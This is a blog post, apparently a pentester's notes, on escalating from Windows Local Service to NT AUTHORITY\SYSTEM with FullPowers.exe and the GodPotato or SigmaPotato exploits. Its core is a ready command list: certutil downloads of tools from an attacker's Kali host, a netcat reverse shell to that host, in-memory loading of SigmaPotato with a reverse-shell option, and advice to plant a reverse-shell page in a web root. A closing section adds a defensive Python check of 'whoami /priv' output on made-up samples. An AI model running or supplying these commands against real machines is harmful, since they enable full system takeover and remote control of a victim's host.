Restore Windows privilege and escalate to NT AUTHORITY\SYSTEM

Introduction

I have encountered a good situation to learn one of the Windows privilege escalation techniques: restoring the current privileges back to the default ones (including SeImpersonatePrivilege) and exploiting it with the Potato family to escalate to NT AUTHORITY\SYSTEM.

I will not cover the details of the exploits here. You can read them at the links in the command listing below.

Assumption

First, you should be running as the Local Service or Network Service account. If you are a normal user, think through how you could escalate to Local Service or Network Service. You could check whether any of the typical service privilege escalation techniques can be leveraged. When a web server is running as Local Service, you could put a reverse shell script page in the web root and open the page via a browser :)

Privilege Escalation Commands

Then, you could try:

  • Restore the default privileges, including SeImpersonatePrivilege, with FullPowers.exe.
  • Use the GodPotato or SigmaPotato exploit to escalate to NT AUTHORITY\SYSTEM.

Here is a list of the commands.

# https://itm4n.github.io/localservice-privileges/
# https://github.com/itm4n/FullPowers

# Kali 
>sudo python3 -m http.server 80
# Target
>certutil -urlcache -split -f http://<your kali IP>/FullPowers.exe
>whoami /priv
>FullPowers.exe 
# or 
>FullPowers.exe -x 
>whoami /priv

# Once you see SeImpersonatePrivilege
# Run GodPotato with netcat 
# https://github.com/BeichenDream/GodPotato 

# Kali
>rlwrap nc -nlvp 1234
# Target 
>certutil -urlcache -split -f http://<your kali IP>/GodPotato-NET4.exe
>certutil -urlcache -split -f http://<your kali IP>/nc.exe
>GodPotato-NET4.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe <your kali IP> 1234"

# OR 

# Run SigmaPotato.exe with reverse shell option
# https://github.com/tylerdotrar/SigmaPotato

# Target
>powershell
>[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://<your kali IP>/SigmaPotato.exe"))

# Kali 
>rlwrap nc -nlvp 1234
# Target 
>[SigmaPotato]::Main(@("--revshell","<your kali IP>","1234"))

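As an added example that is not part of the original post: a small Python audit that parses `whoami /priv` output, so a defender checking a service account can confirm its token is still restricted and flag SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (the privileges the Potato exploits depend on) if they reappear. Both sample captures are constructed, not real output from a host.

```python
import re

# Token privileges that let a service account impersonate clients or assign
# primary tokens; these are what the Potato-style exploits rely on.
HIGH_RISK = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# One table row of `whoami /priv`: privilege name, free-text description, state.
_ROW = re.compile(r"^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)$")

# Constructed sample: a restricted LOCAL SERVICE token before any reset ...
BEFORE = """\
PRIVILEGES INFORMATION

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# ... and the same account holding its default privilege set afterwards.
AFTER = """\
PRIVILEGES INFORMATION

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

def parse_whoami_priv(text: str) -> dict[str, bool]:
    """Map each listed privilege name to True if its state is Enabled."""
    privs: dict[str, bool] = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs

def gained_privileges(before: str, after: str) -> set[str]:
    """Privileges present in the later capture but absent from the baseline."""
    return set(parse_whoami_priv(after)) - set(parse_whoami_priv(before))

def risky_privileges(text: str) -> set[str]:
    """High-risk privileges held in a capture, whether enabled or disabled."""
    return HIGH_RISK & set(parse_whoami_priv(text))
```

Feed it two real captures of `whoami /priv` from the same service account (baseline and current) to see which privileges came back; a disabled privilege still counts, since it can be enabled by the holder.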
Happy Hacking!

This post is licensed under CC BY 4.0 by the author.